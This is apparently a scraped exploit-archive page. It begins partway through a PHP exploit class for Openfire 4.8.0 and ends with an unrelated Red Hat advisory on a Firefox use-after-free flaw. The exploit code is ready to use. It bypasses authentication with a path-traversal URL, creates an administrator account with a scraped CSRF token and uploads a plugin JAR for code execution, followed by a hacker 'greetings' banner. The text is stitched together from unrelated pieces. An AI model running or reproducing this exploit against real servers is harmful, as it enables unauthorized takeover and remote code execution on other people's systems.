generateRandomPassword($minLength, $maxLength)    {        return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));    }    private function sendRequest($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        return curl_exec($ch);    }    private function getCsrfToken()    {        $response = $this->sendRequest('GET', 'login.jsp');        preg_match('/csrf=([^;]+)/', $response, $matches);        return $matches[1] ?? null;    }    private function authBypass()    {        $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');        // Check if we can access the user-groups.jsp page        return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;    }    private function addAdminUser()    {        $this->csrfToken = $this->getCsrfToken();        $data = http_build_query([            'csrf' => $this->csrfToken,            'username' => $this->adminUsername,            'password' => $this->adminPassword,            'passwordConfirm' => $this->adminPassword,            'isadmin' => 'on',            'create' => 'Create User'        ]);        return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);    }    private function uploadPlugin($pluginFilePath)    {        $this->csrfToken = $this->getCsrfToken();        $cfile = new CURLFile($pluginFilePath);        $data = [            'uploadfile' => $cfile,            'csrf' => $this->csrfToken        ];        $headers = ['Content-Type: multipart/form-data'];        return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);    }    public function exploit()    {        if ($this->authBypass()) {            echo "Authentication bypass successful.\n";            if ($this->addAdminUser()) {                echo "Admin user '{$this->adminUsername}' added successfully.\n";                // Prepare plugin JAR file path                $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file                if ($this->uploadPlugin($pluginJarPath)) {                    echo "Plugin uploaded successfully.\n";                } else {                    echo "Failed to upload plugin.\n";                }            } else {                echo "Failed to add admin user.\n";            }        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new OpenfireExploit('http://target-openfire-url.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Openfire 4.8.0 Code Injection

Red Hat Security Advisory 2024-7977-03 - An update for firefox is now available for Red Hat Enterprise Linux 8. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7977.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:7977-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7977Issue date:         2024-10-11Revision:           03CVE Names:          CVE-2024-9680====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: Use-after-free in Animation timeline (128.3.1 ESR Chemspill) (CVE-2024-9680)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9680References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317442

Tag

#firefox